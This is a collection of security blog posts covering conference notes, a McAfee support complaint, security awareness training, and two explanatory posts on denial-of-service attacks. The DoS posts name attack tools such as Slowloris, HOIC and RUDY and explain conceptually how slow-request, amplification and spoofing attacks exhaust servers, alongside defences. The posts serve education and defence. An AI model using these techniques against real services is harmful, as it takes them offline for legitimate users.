Gartner Security and Risk Management conference – Continuous Application Security Monitoring

This was a talk from Whitehat Security covering the the increasing need for continuous application security monitoring and how this should be integrated with the SDLC;

– Attacks becoming targeted to specific companies / industries

– Risk of severe brand damage

– Security risks becoming key concern at board level

 Effective web application security programs must comprise of;

  • Continuous, concurrent assessments
    • Continuous process – restart on completion of assessment, automatic, no need for manual intervention
    • Assess multiple applications / code bases concurrently, not serially – minimises vulnerability window
  • Manage Security posture
    • ongoing metrics and measurement
    • Real-time risk modelling
      • Understand exposure to high value business applications
      • Accurate prioritsation
      • Analytics and trend reporting
      • Benchmark with industry peers
      • Dashboards and in-depth vulnerability reports
  • Implement across SDLC
    • From requirements and design through development to deployment and production monitoring
      •  Production assessments (immediate response)
      • Pre-production (reduce cost)
      • Source code analysis (faster remediation)

Talk was very brief and don’t go into any real detail about what you should do, when to do it, how the SDLC might actually look, process of find issues – verify – plan – resolve – test not covered.  Basic points that were covered do make sense though but I’d have liked the full session to be used and a lot more detail to be covered.

Completely agree however that continuos monitoring of application and code security should be high on the security agenda – remember, that vast majority of vulnerabilities and successful attacks are against applications..  Secure development should be a key foundation of any businesses SDLC.

K

Updates and what’s coming up..

As mentioned in my McAfee post, I’d meant to produce a quick update post covering recent goings on and what’s coming up as my blog updates have been a little erratic over the last few months..

Life has been pretty busy, on top of work, getting married and a couple of honeymoons I now officially have my Masters in ‘Distributed Systems and Networks’!  This is has been a lon while coming as I have been working on my part time MSc for the last 2.5-3 years outside of office hours.  Getting a ‘commended’ result was very pleasing as I expected just a standard ‘pass’.  OK so it’s not a distinction, but still good.

This has also meant my work with the Cloud Security Alliance has slide somewhat this year due to a lack of time.  I’m hoping to get back more involved with that now things will hopefully be slowing down slightly, well apart from the impending house move of course!

Regarding work, I’m still getting to work with some very interesting projects and great technologies some of which I’ll be writing about in upcoming posts.

Talking of upcoming posts, I am at the Gartner Security and Risk Management conference this week, and the Information Security Forum world annual congress in November, both of which should provide some interesting material to share.  I’ll likely try to follow a similar approach to previous conferences and mainly ‘live-blog’ from the talks as they happen.

K

Data breaches visualisation

Came across this recently and think its a pretty decent demonstration of the continuing frequency and severity of data breaches;

http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

You can hover over any of the circles then click for more information about that breach.

This also shows how companies never seem to learn and we are seeing more breaches of a very similar nature to those we were seeing several years ago.

It’s time to learn from our mistakes and actually design and build secure systems, not just tick compliance boxes!  This is definitely one of my personal bug-bears, as an example, many companies that must maintain PCI compliance care about this for obvious reason, but too often projects and system owners only care about this and not actually being secure or making systems and ‘non PCI’ data secure.  This is despite the payment card industry being very clear that PCI-DSS is the bare minimum standard you must achieve to be permitted to handle card transactions, not the standard you should aim for to be a secure business and keep your customers data secure.

It’s time to get better at communicating the risks to the business and working to ensure secure design and implementation is at the forefront of any solution.

K

An ode to McAfee.. Purveyors of the finest scamware

So I was getting ready to post about various things that have been keeping me busy recently and some upcoming plans, but a recent interaction with McAfee promoted me to write about their excellent service first..

Last week my father in law’s computer became infected with a trojan.  Not the biggest issue you’d think and a fairly common occurrence.  However he was running fully up-to-date McAfee protection that he actually pays the princely sum of about £55 per year for.

This is failure one, a pensioner who only uses the internet for running an motorcycle club, booking holidays and general browsing becomes infected with a Trojan despite having fully up to date and paid for anti-malware installed.

Then we go through the process of this exceptional anti-malware software trying to remove the trojan that goes something like this;

– McAfee needs to reboot your computer to remove the malware

– Reboot

– McAfee needs to reboot your computer to remove the malware

.. and so on

This failure is issue two.

The next is perhaps the worst failure of all, as a paying customer, my father in law then decided to contact McAfee customer support.  After a long winded conversation with someone who could barely understand him, he was finally put through to technical support.  At last someone who could help.  Well, they did understand the problem and were able to tell him his software that he subscribes to from them was likely disabled by the trojan, and that his firewall was also likely turned off.  Their next statement was that they would required a further £56 in order to provide any assistance.

So – pay a yearly subscription for McAfee anti malware, it doesn’t work..  Then when you call them for assistance they want more money to help resolve the issue caused by their solution not working!

When asked point blank what the subscription fee gets you over and above using a free anti-malware solution the response was well erm nothing sir.

So my advice to you and to anyone you know who may ask you advice on which anti-malware solution to use is;

– Don’t use McAfee

– Don’t pay for it if you are comfortable using one of the many excellent free products such as AVG free

– If you do pay for it, make sure you have a clear understanding of just what your investment will get you

– Oh and don’t use McAfee.

I have no idea if the other paid for solutions offer a service this bad, but it seems to put them on par with the scamware type vendors – here install this, when it doesn’t work pay us more to help.  The only difference is McAfee put a legal and friendly face on their scam, which probably makes them worse.

And to top it off, guess who is probably going to have to go and clean the infected machine now..

Apologies for the slightly ranty post, but this was massively poor on McAfee’s part.

A more balanced post about general IT stuff, my Masters and some upcoming plans will follow shortly 🙂

K

Security Awareness Training – Worthwhile?

One of the topics that I sometimes think about is the value of security awareness training.

This tends to be a topic that many people in the security industry seem fairly passionate about, either for or against the value of it.
Vendors of software / programs such as Wombat, PhishMe, SANS etc. are all very pro user awareness training and regular programs to raise security awareness.
Conversely companies who sell products and not training are likely to strongly advise security budget is spent on tools rather than awareness training. To renforce this point at RSA Europe last year I actually asked a couple of senior RSA guys about the value of awareness training when they did a presentation around improving security and where to spend, and was told somewhat strongly that awareness training was basically a waste of time.

So the question is who is right, or do both sides have a fair point?

On the for side – how can users be expected to act securely and know how to act securely without some training? People need to learn and understand how to spot phishing emails, why it is bad to send anything non public externally without it being encrypted, why stronga and unique passwords should be used, how to spot social engineering etc. Security awareness training and campaigns can serve a dual purpose –
– Ensure users learn more about security for both their work and home IT / online lives
– Raise general awareness – a continual program of advice and varied messages keep general security and secure methods of working on peoples minds – this should not be a once a year process.
Any increase in security awareness and reduction in the attack surface that is the human user must be a good thing right?

On the against side – what is the most effective way to spend a limited security budget? Does spending budget on training offer the sam improvement in overall security as say adding a further layer to the defence in depth strategy or hiring extra dedicated IT security personel? Even with training a significant number of users will stil click the link in a phishing email or give out details they shouldn’t to a social engineer, so you still need all the other defences, both technical and personel even if an extensive security awareness program is undertaken.
– Users will always be a large security risk, so it’s best to treat them and their actions as untrusted and create a security posture accordingly.

So which side is right? I think to a large extent they both are. Depending on which report you read, something like 60-80% of all APT (Advanced Persistent Threat) attacks are initiated via social engineering – e.g. getting a user to do something for the attacker. So the most insidious attacks that are very difficult to detect and currently being used by the security industry as the driver for selling new security tools tend to start with the user. Then surely reducing the chances someone will succumb to social engineering much be a good thing? Yes you’ll never get to 100%, but then no actual security device ever detects or prevents 100% of attacks. So why do security tool vendors not like awareness training? Likely money and profits.

A balanced approach is key, understand the environment and threat landscape your company operates in and create a holistic security program encompassing the necessary tools, skilled security personal and user awareness training.

So, how can awareness training be made as effective as possible? Along with mixed and continuous messages and taking the time to make security part of the culture, the key thing is to get the message to people and make them want to take it on board. I think there are two components to make this successful;
– Fear – not with lies or exaggeration, but highlight real stories, as especially stories that people will relate to so think Playstation and Bank / online shopping hacks.
– Make it relevant – Link the secure ways of working to peoples home lives so highlight how they can be secure online, not fall for scams, use social sites as safely as possible, shop safely etc.

To conclude my opinion is that security awareness training does add real value and should be part of any security program. It does not however replace in anyway the need for a strong defence in depth strategy aligned to your business and threat landscape. What do you think?

K

Denial of Service attacks part 2

My previous post on this topic covered the basics of DDoS in terms of what it is and the most commonly thought of attack type.
This post will cover some of the more interesting DDoS attacks that don’t rely just on the brute force approach of massive traffic volume to bring down a service, which attacks are also known as volumetric attacks.

The two categories of DDoS that will be covered in this post are known as RFC / Compliance Attacks and Compute Intensive Attacks.

RFC / Compliance Attacks

These typically work against vulnerabilities in either network protocols or web servers. Some examples of this form of attack are;
– Ping of Death; attacks and ICMP vulnerability
– Teardrop; works against TCP/IP fragmentation vulnerabilities in many implementations of the protocol suite
– Land; Spoof source address to send SYN packets to the host from it’s own IP address
– Apache Killer; TCP based attack against the Apache web server
– HashDoS (hash collision); attack that creates hashing collisions to DDoS various web and application servers

All of the above attacks exploit vulnerabilities in networking or application implementations and do not require a huge volume of traffic to potentially bring down a service.

As more detailed examples;
– Apache Killer; This relies on the fact that the byte range filter in some versions of the Apache web server allowed attackers to cause a DoS of the sever by sending it a header that covers multiple overlapping ranges.
– Hash DoS involves exploiting hash collisions to exhaust CPU resources. This is cause by the ability to force a large number of collisions via a single, multi parameter request.

Compute Intensive Attacks

These are attacks that typically exploit weaknesses in application workflows / process that allow certain interactions to use huge amounts of server resource or take inordinate amounts of time. Some examples of these are;
– HOIC; attacks by sending very Slow Gets, and Slow Posts
– Darkshell; send SYN, attacks HTTP idle timeout congestions
– Simple Slowloris; sends incomplete headers
– RUDY; Slow posts and long form field submissions
– Tor Hammer; sends very slow posts

These work my sending multiple slow or incomplete requests in parallel, this can quickly exhaust the web or application servers ability to service new requests without requiring a huge amount of bandwidth or resource from the attacker.

How have these evolved over the last few years?
– Initially stated with attacks like the original Slowloris that sends a very slow GET requests where the header is send extremely slowly such that it almost never actually completes. This has been very effective against the Apache web server
– Then there was the slow POST, as with the slow GET, this is a POST that is sent so slowly it almost never completes. This one is also affective against various flavours of IIS
– The most recent addition is the slow Read, where a large object is requested, then downloaded extremely slowly

These all enable the attacker to use up very many connections on the web or application server without the need for large bandwidth to be at their disposal.

There has been further tuning of these type of attacks to be specific against applications and databases that use similar techniques to make ‘legal’ requests of the system that lead to large resource requirements on the server. These can be targeted and fine tunes to cause maximum damage.

These types of attack are much more insidious than the volumetric attacks covered in the previous post as they need less resource at the attacker end so can be easier to launch. In addition the compute intensive attacks make use of allowable, normal application behaviour that is manipulated to cause a Dos condition. As such these attacks can be much harder to detect and block; at what point does a connection that is potentially just over a slow connection be identified as an attack?

This is where you have to start looking at advanced application layer defences that are tuned and configured specifically for the applications they are defending. This is another relatively large topic that I’ll likely cover in a later post, as we have now covered off the three usually identified categories of DDoS attack.

K

Denial of Service Attacks part 1

Denial of Service attacks (DoS) and Distributed Denial of Service attacks have the same purpose; to make the service in question unavailable to those trying to make use of it.

The type of attack most commonly associated with DoS / DDoS is that of bandwidth or resource exhaustion.  These are attacks where a malicious user or group sends a large enough volume of traffic to the service, usually a web site, such that it becomes unavailable to legitimate users.  These attacks are based on simple math, if a web service has the capacity to service 2Gb per second, and an attacker can consistently send greater than 2Gb per second then they can likely make the service unavailable to legitimate users (anti DoS measures not withstanding).  This also works in terms of server resource, if an attacker can send enough requests to overload the servers hosting a service they can make the service unavailable to legitimate users.

At its simplest, this type of attack originates from a collection of machines, likely a bot-net, all sending requests to a web service until the bandwidth that service has available is exhausted.

This type of attack has historically been very successful in taking down web sites / services for periods of time.  It is however an attack that has well defined methods of defending against and many vendors offer services to protect against it.  These usually take the form of high bandwidth ‘cleaning centres’ or ‘scrubbing centres’ that monitor traffic going to through them to their customers.  These employ various trafic analysis techniques and can block / clean very large volumes of traffic while still sending legitimate traffic onto the service that is under attack.

This type of attack is made considerably worse by the ability to amplify the attack such that a relatively small volume of source traffic can become a huge volume of traffic hitting the victim systems.  Examples of these amplification attacks are ‘Smurf’ and ‘DNS amplification’.  These attacks have received considerable press recently due to their successful and high impact use in things such as the Spamhaus attack;

http://www.theregister.co.uk/2013/03/27/spamhaus_ddos_megaflood/

This was billed as the ‘biggest DDoS attack in history’.

A good overview of DNS amplification attacks can be found here;

http://blog.cloudflare.com/deep-inside-a-dns-amplification-ddos-attack

The success of these attacks highlights the need to ensure that all internet connected routers and DNS servers are correctly and securely configured.  Most (possibly all) of the amplification attacks rely on address source spoofing – they spoof the IP address of the victim systems as the source of the initial request so that the amplified replies go to this address, not the attackers.  I find it a shame that these types of attacks that rely on source address spoofing could largely be eliminated if devices were configured according to RFC 2267, published in 1998!

http://www.ietf.org/rfc/rfc2267.txt

However, while these attacks are both common and insidious, they are the most simple form of DoS/DDoS attack.  They are also the most simple to defend against for all but the most massive attacks.

So that briefly covers the most commonly thought of Denial of Service attacks.  The next post will go into more details around the much more interesting, to me anyway, DoS attacks that work by attacking issues in TCP/IP stacks, and web server functionality etc.

K